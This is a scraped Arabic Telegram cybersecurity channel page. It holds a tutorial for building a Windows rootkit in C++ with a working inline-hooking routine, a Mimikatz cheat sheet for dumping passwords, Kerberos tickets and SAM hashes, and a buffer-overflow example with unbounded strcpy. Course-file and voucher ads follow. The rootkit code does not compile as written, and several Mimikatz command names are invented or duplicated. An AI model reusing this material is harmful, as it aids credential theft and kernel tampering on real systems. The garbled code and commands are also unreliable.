cookie

نحن نستخدم ملفات تعريف الارتباط لتحسين تجربة التصفح الخاصة بك. بالنقر على "قبول الكل"، أنت توافق على استخدام ملفات تعريف الارتباط.

avatar

code arabs | كود عربي

لا تفوت كل جديد في عالم الأمن السيبراني والبرمجة وكن على اطلاع بكل جديد دائماً 🔥🫡 Don't miss everything new in the world of cybersecurity and programming. Stay up to date with everything new through our 🔥 Buy ads : https://telega.io/c/codearabs

إظهار المزيد
مشاركات الإعلانات
3 670
المشتركون
+924 ساعات
+887 أيام
+17530 أيام

جاري تحميل البيانات...

معدل نمو المشترك

جاري تحميل البيانات...

Photo unavailableShow in Telegram
علشان تعمل Rootkit بيفكك نواة الويندوز بلغة السي 👩‍💻 هنستخدم أسلوب الـOOP ونقسم الكود إلى كلاسز. ركز معايا وهقولك كل حاجة:⏰ 1. كلاس الـ Rootkit: - بيحتوي على الدوال الأساسية اللي هتفكك بيها النواة.📦 - هتحتاج هنا تكتب دالة لتحميل الدرايفر، ودالة تانية للتعامل مع الـIOCTLs.🔐
#include <Windows.h>
#include <iostream>

class Rootkit {
public:
    Rootkit();
    ~Rootkit();
    bool LoadDriver(const char* driverPath);
    bool UnloadDriver();
    bool SendControlCode(DWORD controlCode, LPVOID inBuffer, DWORD inBufferSize, LPVOID outBuffer, DWORD outBufferSize);

private:
    HANDLE hDevice;
};

Rootkit::Rootkit() {
    // كونستركتور
    hDevice = INVALID_HANDLE_VALUE;
}

Rootkit::~Rootkit() {
    // ديستركتور
    if (hDevice != INVALID_HANDLE_VALUE) {
        CloseHandle(hDevice);
    }
}

bool Rootkit::LoadDriver(const char* driverPath) {
    // هنا بنحمل الدرايفر
    // لازم تكتب كود التحميل الفعلي هنا
    return true;
}

bool Rootkit::UnloadDriver() {
    // هنا بنشيل الدرايفر
    // لازم تكتب كود الإزالة الفعلي هنا
    return true;
}

bool Rootkit::SendControlCode(DWORD controlCode, LPVOID inBuffer, DWORD inBufferSize, LPVOID outBuffer, DWORD outBufferSize) {
    // هنا بنبعت IOCTL للنواة
    if (hDevice == INVALID_HANDLE_VALUE) {
        return false;
    }
    DWORD bytesReturned;
    return DeviceIoControl(hDevice, controlCode, inBuffer, inBufferSize, outBuffer, outBufferSize, &bytesReturned, NULL);
}
2. كلاس الـ Hooking: - بيحتوي على الدوال اللي هتعمل hooking للـ SSDT.🤕 - هنحتاج هنا نكتب دوال للـ inline hooks وdetour.‼️
class Hooking {
public:
    Hooking();
    ~Hooking();
    bool SetInlineHook(LPVOID targetFunction, LPVOID hookFunction);
    bool RemoveInlineHook(LPVOID targetFunction);

private:
    BYTE originalBytes[5];
};

Hooking::Hooking() {
    // كونستركتور
}

Hooking::~Hooking() {
    // ديستركتور
}

bool Hooking::SetInlineHook(LPVOID targetFunction, LPVOID hookFunction) {
    // هنا بنعمل inline hook
    DWORD oldProtect;
    VirtualProtect(targetFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    memcpy(originalBytes, targetFunction, 5);
    DWORD relativeAddress = ((DWORD)hookFunction - (DWORD)targetFunction - 5);
    *((BYTE*)targetFunction) = 0xE9;
    *((DWORD*)((BYTE*)targetFunction + 1)) = relativeAddress;
    VirtualProtect(targetFunction, 5, oldProtect, &oldProtect);
    return true;
}

bool Hooking::RemoveInlineHook(LPVOID targetFunction) {
    // هنا بنشيل الـ inline hook
    DWORD oldProtect;
    VirtualProtect(targetFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
    memcpy(targetFunction, originalBytes, 5);
    VirtualProtect(targetFunction, 5, oldProtect, &oldProtect);
    return true;
}
3. كلاس الـ Communication: - بيحتوي على الدوال اللي بتعمل التواصل مع الدرايفر. 🕦 - هنحتاج هنا نكتب دوال للقراءة والكتابة من وإلى النواة.‼️
class Communication {
public:
    Communication();
    ~Communication();
    bool ReadMemory(DWORD_PTR address, LPVOID buffer, SIZE_T size);
    bool WriteMemory(DWORD_PTR address, LPCVOID buffer, SIZE_T size);

private:
    Rootkit* rootkit;
};

Communication::Communication() {
    // كونستركتور
    rootkit = new Rootkit();
}

Communication::~Communication() {
    // ديستركتور
    delete rootkit;
}

bool Communication::ReadMemory(DWORD_PTR address, LPVOID buffer, SIZE_T size) {
    // هنا بنقرأ من الذاكرة
    return rootkit->SendControlCode(/*IOCTL_READ_MEMORY*/, &address, sizeof(address), buffer, size);
}

bool Communication::WriteMemory(DWORD_PTR address, LPCVOID buffer, SIZE_T size) {
    // هنا بنكتب في الذاكرة
    return rootkit->SendControlCode(/*IOCTL_WRITE_MEMORY*/, &address, sizeof(address), (LPVOID)buffer, size);
}
بهذا الشكل، الكود هيبقى مقسم ومنظم باستخدام الـOOP.🌐 كل كلاس يقوم بوظيفة معينة، وبكده يبقى عندك Rootkit قابل للتوسيع والتطوير بسهولة.🔐 تحياتنا لكم من فريق "Technology Makers"! 🥰 🥰 للوصول لمقالات من هذا النوع يمكنك الضغط علي الهاشتاغ التالي : ➡️ #exploit_development 👑Our Channels : [ Click Here To Join ]
إظهار الكل...
Photo unavailableShow in Telegram
ما هي Mimikatz : ‼️ ميمي كاتز هي أداة متقدمة جدًا للمخترقين حيث تمكنهم من عمل اشياء كثيرة مثل التجسس على الأنظمة و تعميق خطورة الاختراق.🔐 سبب تطويرها : ❓ تم تطوير اداة ميمي كاتز عشان تساعد المحققين الرقميين والباحثين في الأمن السيبراني في استخراج معلومات من الأنظمة. ✅ المطور: 👤 الأداه دي تم تطويرها من قبل باحث أمني فرنسي اسمه بنيامين ديلبي في سنة 2011 و ايضا ميمي كاتز ممكن تستغل ثغرات في أنظمة ويندوز عشان تسحب كلمات المرور والمعلومات الحساسة من ذاكرة النظام .🌐 الأوامر الموجودة في ميمي كاتز و وظائفها هي كالتالي :⚙ الـprivilege::debug بيشغل صلاحيات التصحيح في النظام، وده بيدي الهكر قدرة على التحكم الكامل في النظام.🤬 الـsekurlsa::logonpasswords بيستخرج كلمات المرور المخزنة في النظام، وده معناه إن الهكر يقدر يحصل على كلمات المرور بدون ما يبذل جهد كبير.🔐 الـsekurlsa::tickets بيعرض تذاكر الكيربيروس المخزنة في النظام، ودي بتساعد الهكر في الاستيلاء على الجلسات الحالية واستخدامها للوصول للموارد بدون إعادة المصادقة.📱 الـlsadump::sam بيقوم بتفريغ ملفات SAM اللي بتحتوي على كلمات مرور المستخدمين في النظام، وده بيسمح للهكر بإعادة استخدام كلمات المرور دي في هجمات أخرى.📤 الـlsadump::secrets بيظهر الأسرار المخزنة في النظام، وده بيساعد الهكر في الوصول لمعلومات حساسة.🪄 الـtoken::elevate بيحاول يرفع الصلاحيات في النظام، وده معناه إن الهكر يقدر ياخد صلاحيات أعلى ويسيطر على النظام بالكامل.⚔️ الـvault::cred بيعرض معلومات الاعتمادات المخزنة في خزنة الويندوز، ودي معلومات ممكن تكون حساسة جدًا.😧 الـdpapi::cred بيظهر بيانات DPAPI اللي بتستخدم لحماية البيانات في النظام، وده بيساعد الهكر في فك تشفير البيانات المحمية.🤕 الـcrypto::capi بيعرض مفاتيح CAPI المخزنة في النظام، وده بيساعد الهكر في فك تشفير الاتصالات المشفرة. ✉️ الـcrypto::certificates بيظهر معلومات عن الشهادات المخزنة في النظام، ودي بتساعد الهكر في فهم البنية التحتية للشبكة والتخطيط لهجمات مستقبلية.❗️ الـcrypto::keys بيعرض المفاتيح المخزنة في النظام، وده بيساعد الهكر في فك تشفير البيانات. 🛠 الـmisc::memssp بيظهر بيانات SSP المخزنة في الذاكرة، وده بيساعد الهكر في استغلال الجلسات الحالية. 🧠 الـmisc::sysinfo بيعرض معلومات عن النظام، وده بيساعد الهكر في فهم بيئة العمل والتخطيط للهجوم. 😈 الـmisc::wifi بيظهر ملفات تعريف الواي فاي المخزنة في النظام، وده بيساعد الهكر في الوصول لشبكات الواي فاي المخزنة. 🙈 الـkerberos::list بيعرض قائمة بذاكرة الكيربيروس المخزنة في النظام، وده بيساعد الهكر في استغلال الجلسات الحالية. 🎖 الـkerberos::tgt بيظهر معلومات TGT، ودي بتساعد الهكر في الاستيلاء على الجلسات. ❌ الـkerberos::ptt بيسمح للهكر بتمرير ذاكرة كيربيروس للنظام، وده بيساعد الهكر في الدخول للموارد بدون إعادة المصادقة. ☄️ الـkerberos::kerberos بيعرض تذاكر الكيربيروس المخزنة، وده بيساعد الهكر في الاستيلاء على الجلسات. 💪 الـlivessp::tspkg بيستخرج معلومات TSPKG من LSASS، وده بيساعد الهكر في الحصول على كلمات المرور. 🛡 الـlivessp::msv بيظهر الاعتمادات المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 📀 الـlivessp::credman بيعرض معلومات CredMan المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 👑 الـlivessp::tspkrd بيظهر بيانات TSPKG المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 📀 الـlivessp::wdigest بيظهر بيانات WDigest المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. 📀 الـlivessp::kerberos بيظهر بيانات كيربيروس المخزنة في النظام، وده بيساعد الهكر في الاستيلاء على الجلسات. 🔓 الـlivessp::wdigest بيظهر بيانات WDigest المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور. ⬆️ الـlivessp::cred بيظهر بيانات LSASS المخزنة في النظام، وده بيساعد الهكر في الحصول على كلمات المرور.⬆️ الخاتمة 🥰: ميمي كاتز أداة قوية جدًا وخطيرة في عالم الاختراق استخدام الأداة دي بيد المخترق قدرة هائلة على اختراق الأنظمة والسيطرة عليها بالكامل.🤬 ومن المهم جدًا إنك تتخذ إجراءات أمنية قوية لحماية نظامك من الأدوات دي، زي تحديث النظام باستمرار، وتفعيل خصائص الحماية المتقدمة، وتوعية المستخدمين بالمخاطر الأمنية. 🥰⚙✔️ تحياتنا لكم من فريق "Technology Makers"! 🥰 🥰 للوصول لمقالات من هذا النوع يمكنك الضغط علي الهاشتاغ التالي : ➡️ #exploit_development 👑Our Channels : @TechnologyMakers@codearabs@Abdalrahman0x80_channel
إظهار الكل...
❤‍🔥 3 1 1
Photo unavailableShow in Telegram
ما هي ثغره buffer overflow ؟ 🤔 هو خطأ في برمجة البرمجيات أو ثغرة ممكن تستغلها حتي تقدر تصل لوصول غير المصرح به لـ انظمه الشركات يحدث  عندما يتجاوز حجم البيانات في الذاكرة المؤقتة (المخزنة في مساحات متتالية من الذاكرة) سعتها التخزينية. 📂 ‼️ قبل أن نعرف كيف تحدث هذه الهجمه علينا أن نعرف ثلاث مصطلحات مهمه : 1- الـBuffer 🔗: هو جزء من الذاكرة يستخدم لتخزين البيانات بشكل مؤقت أثناء معالجتها. ⚙ 2-الـHeap 🔗: هو جزء من الذاكرة يمكن تخصيصه وإعادة تخصيصه ديناميكيًا حسب متطلبات البرنامج. ⚙ 3-الـStack 🔗: هو بنية بيانات تستخدم لتنفيذ الاستدعاءات التبادلية (مثل استدعاء الدوال) وتعمل وفق مبدأ "الأخير دخولًا، الأول خروجًا" (LIFO). ⚙ كيف تحدث هجمة Buffer Overflow ؟ - يحدث عندما يتم تجاوز حدود منطقة الذاكرة المؤقتة (البافر) المخصصة لتخزين البيانات. هذا يمكن أن يؤدي إلى تلف البيانات أو الكتابة فوقها. هنا مثال بسيط باستخدام لغة البرمجة C:👩‍💻 🌐 الدوال و التهيئة: ⚙
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
// Function to generate a random hash
void generate_random_hash(char *hash, size_t length) {
    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    if (length) {
        for (size_t n = 0; n < length - 1; n++) {
            int key = rand() % (int)(sizeof(charset) - 1);
            hash[n] = charset[key];
        }
        hash[length - 1] = '\0';
    }
}
- هنا بنعمل include لمجموعة مكتبات أساسية في C عشان نقدر نستخدم الدوال اللي فيها.⚙ - بعد كده، عرفنا دالة اسمها `generate_random_hash`، واللي بتعمل Hash عشوائي بطول معين.⚙ -الـcharset هو عبارة عن مجموعة من الحروف والأرقام اللي بنستخدمها عشان نكون الـHash.⚙ - بنستخدم rand() عشان نجيب رقم عشوائي ونستخدمه عشان نختار حرف من charset.⚙ الجزء الثاني: الدالة الرئيسية main 🕦
int main(int argc, char *argv[]) {
    // Allocate 5 bytes for the buffer plus null terminator
    char buffer[5];
    char current_hash[33]; // Store the current hash
    time_t start_time, current_time;

    if (argc < 2) {
        printf("strcpy() not executed....\n");
        printf("Format: %s <characters>\n", argv[0]);
        exit(0);
    }
    // Generate an initial hash
    srand(time(NULL));
    generate_random_hash(current_hash, sizeof(current_hash));
    // Copy user input to the buffer without boundary checking
    strcpy(buffer, argv[1]);
    printf("Buffer content: %s\n", buffer);
    printf("strcpy() executed...\n");
    // Set time to start polymorphism
    start_time = time(NULL);
- الـbuffer بيخصص 5 بايت عشان نخزن فيه المدخلات من المستخدم.📱 - الـcurrent_hash بيخزن الـHash العشوائي الحالي.📱 - بنشيك على عدد المدخلات اللي جاية من المستخدم (argc) عشان نتأكد إن في مدخل على الأقل.⚙ - لو مفيش مدخل كافي، بنطبع رسالة خطأ ونخرج من البرنامج.☝ - بنستخدم srand(time(NULL)) عشان نبدأ التوليد العشوائي بناءً على الوقت الحالي. 🖥 - بنعمل توليد أولي للـHash باستخدام generate_random_hash.🔐 - بنستخدم strcpy عشان ننسخ المدخلات اللي جاية من المستخدم في `buffer`، من غير ما نعمل أي فحص للحدود.⏰ ### الجزء الثالث: التكرار الأبدي و تغيير الـ Hash 🔐:
    while (1) {
        current_time = time(NULL);

        // Change the hash every 30 seconds
        if (difftime(current_time, start_time) >= 30) {
            generate_random_hash(current_hash, sizeof(current_hash));
            printf("Hash changed to: %s\n", current_hash);
            start_time = current_time;
        }
        // Execute dynamic codes or other updates here
        // This part may include malicious code like loading new scripts or changing behavior
        sleep(1); // Reduce processor usage
    }
    return 0;
}
- بنعمل while (1) عشان ندخل في حلقة لا نهائية. - بنقيس الوقت الحالي (current_time) و بنقارن الوقت اللي فات (difftime) عشان نشوف إذا عدت 30 ثانية. - لو عدت 30 ثانية، بنغير الـHash باستخدام generate_random_hash وبنطبع الـHash الجديد. - بنحدث الوقت اللي بدأنا منه (start_time). - في الجزء ده ممكن نضيف أكواد ديناميكية أو تحديثات (وده ممكن يشمل أكواد خبيثة). - بنستخدم sleep(1) عشان نقلل استخدام المعالج. وهذا كان التحليل الخاص بالكود نلقاكم بإذن الله في الجزء الثاني من المقال🥰 @TechnologyMakers_Articles@codearabs
إظهار الكل...
❤‍🔥 6 4 3
🆕 Make your own Hacker Gadget 👽 هل تواجه صعوبة في فهم اللغة الإنجليزية؟ لا تقلق نفهم أن اللغة قد تكون عائقًا أمام بعض المشاركين، لذلك توفر أنجز ترجمة فورية للكورسات لضمان حصول جميع المشاركين على أقصى استفادة من هذه التجربة التعليمية القيّمة. سجل طلبك للترجمة الآن وكن جزءًا من مجتمع الخبراء الأمنيين
⬅️ شارك هذه الدورة مع أصدقائك وانضم إلى المجلد لرحلة تعليمية متكاملة
إظهار الكل...
Make your own Hacker Gadget.zip200.80 MB
Make your own Hacker Gadget.z011500.00 MB
Photo unavailableShow in Telegram
#Pentester Academy | Make your own Hacker Gadget 🔥 لقد سمعنا جميعًا عن أو استخدمنا أدوات القراصنة مثل WiFi Pineapple و Minipwner و Pwn Plug و R00tabaga إلخ. إنها رائعة للاستخدام في العروض التوضيحية، وفي مهام الهندسة الاجتماعية، وشرح الآثار الأمنية بطريقة ممتعة لغير المحترفين في الأمان، وفي أتمتة مهام اختبار اختراق الفعلية! ولكن ما الذي يلزم لبناء واحدة؟ 😏في هذه الدورة، سنعلمك كيفية بناء أداة قراصنة (أو أداة اختبار اختراق إذا كنت تفضل ;) ) 📣 كم من الخبرة الفنية تحتاج إلى متابعة هذه الدورة؟ ⚔️ - إذا كنت قد قمت بتثبيت نظام Linux وضبطت نقطة دخول مرة، فستشعر بالراحة تمامًا! info = https://www.pentesteracademy.com/course?id=15 👽 هل تواجه صعوبة في فهم اللغة الإنجليزية؟ لا تقلق نفهم أن اللغة قد تكون عائقًا أمام بعض المشاركين، لذلك توفر أنجز ترجمة فورية للكورسات لضمان حصول جميع المشاركين على أقصى استفادة من هذه التجربة التعليمية القيّمة. سجل طلبك للترجمة الآن وكن جزءًا من مجتمع الخبراء الأمنيين
⬅️ شارك هذه الدورة مع أصدقائك وانضم إلى المجلد لرحلة تعليمية متكاملة
#الهكر_الأخلاقي #الامن_السيبراني #امن_المعلومات #الاختراق
إظهار الكل...
Photo unavailableShow in Telegram
إظهار الكل...
4 4🔥 3🆒 1
Repost from N/a
الحمدلله اتممنا نشر فهرس دورة CompTIA IT Fundamentals + اختاروا الدورة التالية لترجمتها:Anonymous voting
  • A+
  • Linux+
  • Network+
  • Security+
  • Cloud+
0 votes
🏆 10 5🐳 4💯 3🕊 2👍 1🆒 1
Repost from N/a
Photo unavailableShow in Telegram
🔥 Tryhackme voucher code 😟 1 Month  210 LE 😟 2 Month  420 LE Crypto or Vodafone cash 💵 💲 ✈️ @Mrsud0B 🔥 العرض لفتره محدوده 3 Month 600 LE 🔥 🫡 @Mrsud0B
إظهار الكل...
🏆 17 16🐳 16🕊 12💯 10👌 7❤‍🔥 1 1
🆕 دورة تدريبية شاملة في الأمان السيبراني: من الصفر إلى الاحتراف
⬅️ شارك هذه الدورة مع أصدقائك وانضم إلى المجلد لرحلة تعليمية متكاملة ⚡️
#Cybersecurity #EthicalHacking #الامن_السيبراني
إظهار الكل...
01 - Introduction.zip69.28 MB
02 - Introduction To Cyber Security.zip118.53 MB
03 - Cyber Security Basic Theory and Goals.zip139.98 MB
04 - Understanding Hackers - The Biggest Threat.zip157.38 MB
05 - Security Bugs and Vulnerabilities - Part 01.zip183.24 MB
05 - Security Bugs and Vulnerabilities - Part 02.zip127.85 MB
06 - Social Engineering Basics.zip101.72 MB
07 - End-Point Protection - Part 01.zip261.25 MB
07 - End-Point Protection - Part 02.zip278.07 MB
Photo unavailableShow in Telegram
🆕 دورة تدريبية شاملة في الأمان السيبراني: من الصفر إلى الاحتراف 🔰 Complete Cybersecurity Bootcamp: Zero to Mastery ⏲️ 11 ساعة 📁 98 درساً 📕 دورة تدريبية في الأمان السيبراني ستأخذك من الصفر إلى الوظيفة كمهندس أمان سيبراني. ستتعلم أحدث الممارسات الجيدة والتقنيات والأدوات المستخدمة في أمان الشبكة حتى تتمكن من بناء قلعة للأصول الرقمية ومنع القراصنة السوداء من اختراق أنظمتك. 🔈 يقدمها: أليكسا تامبوركوفسكي
⬅️ شارك هذه الدورة مع أصدقائك وانضم إلى المجلد لرحلة تعليمية متكاملة ⚡️
#Cybersecurity #EthicalHacking #الامن_السيبراني
إظهار الكل...
اختر خطة مختلفة

تسمح خطتك الحالية بتحليلات لما لا يزيد عن 5 قنوات. للحصول على المزيد، يُرجى اختيار خطة مختلفة.